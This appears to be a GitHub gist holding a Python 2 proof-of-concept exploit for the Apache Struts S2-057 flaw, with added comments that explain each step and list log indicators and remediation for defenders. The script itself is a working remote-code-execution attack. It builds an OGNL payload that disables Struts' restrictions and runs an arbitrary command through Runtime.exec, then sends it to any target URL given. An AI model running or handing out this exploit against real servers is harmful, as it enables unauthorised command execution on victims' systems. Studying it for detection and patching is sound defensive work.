
@frohoff frohoff/s2-057.py
Created Aug 23, 2018

Struts S2-057 PoC exploit
# Proof of concept for the Apache Struts advisory S2-057, written for Python 2
# (print statements, urllib.quote).
#
# What it does: builds an OGNL expression, URL-encodes it, and places it in the
# request path as an extra segment in front of the last path segment of [url].
# The expression is only evaluated by a Struts application that is vulnerable
# and configured as described in the S2-057 advisory; a patched or unaffected
# application treats the segment as an ordinary, non-matching path.
#
# For defenders: the request this script sends is a plain GET whose path holds
# a percent-encoded "${...}" expression (it starts with %24%7B). Letters, digits
# and dots are not percent-encoded by urllib.quote, so the class and method
# names in the payload (ognl.OgnlContext, DEFAULT_MEMBER_ACCESS, OgnlUtil,
# setExcludedPackageNames, setExcludedClasses, setMemberAccess,
# java.lang.Runtime) appear literally in access logs and can be matched by
# WAF/IDS rules. Remediation is upgrading Struts to a release listed as fixed
# in the S2-057 advisory; request filtering is a stopgap only.
#
# some ideas from https://mp.weixin.qq.com/s/iBLrrXHvs7agPywVW7TZrg
import sys
import urllib
# NOTE(review): urllib2 is imported but never used below.
import urllib2
# Exactly two arguments are required: the target action URL and the command.
if len(sys.argv) != 3:
# NOTE(review): the next two lines are the body of the `if` above; their
# indentation was lost when this page was extracted.
print 'Usage: %s [url] [command]' % sys.argv[0]
exit(1)
_, url, cmd = sys.argv
# The OGNL expression, step by step:
#   #dm        - takes OgnlContext.DEFAULT_MEMBER_ACCESS
#   #context   - reads the OGNL context from the request's value stack
#   #container - fetches the xwork2 container from that context
#   #ognlUtil  - obtains the OgnlUtil instance from the container
#   setExcludedPackageNames('') / setExcludedClasses('')
#              - clears OgnlUtil's exclusion lists
#   setMemberAccess(#dm)
#              - swaps in the default member access taken in the first step
#   Runtime.getRuntime().exec('<cmd>')
#              - starts the supplied command on the server
# The steps before exec() exist only to switch off Struts' OGNL restrictions,
# so seeing any of them in a request path is a strong indicator on its own.
# Backslashes and single quotes in cmd are escaped so the value stays inside
# the single-quoted OGNL string literal.
payload = "${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#context=#request['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedPackageNames('')).(#ognlUtil.setExcludedClasses('')).(#context.setMemberAccess(#dm)).(#cmd=@java.lang.Runtime@getRuntime().exec('%s'))}" % (cmd.replace('\\','\\\\').replace("'","\\'"))
# Split the URL at its last '/', giving the prefix and the final path segment.
url_parts = url.rsplit('/', 1)
# Rebuild the URL as <prefix>/<percent-encoded payload>/<final segment>.
request = url_parts[0] + '/' + urllib.quote(payload) + '/' + url_parts[1]
print 'payload: %s' % payload
print 'request: %s' % request
print 'making request'
# The return value of urlopen is discarded: the script never reads the status
# or body, so 'done' below only means the call returned without raising.
urllib.urlopen(request)
print 'done'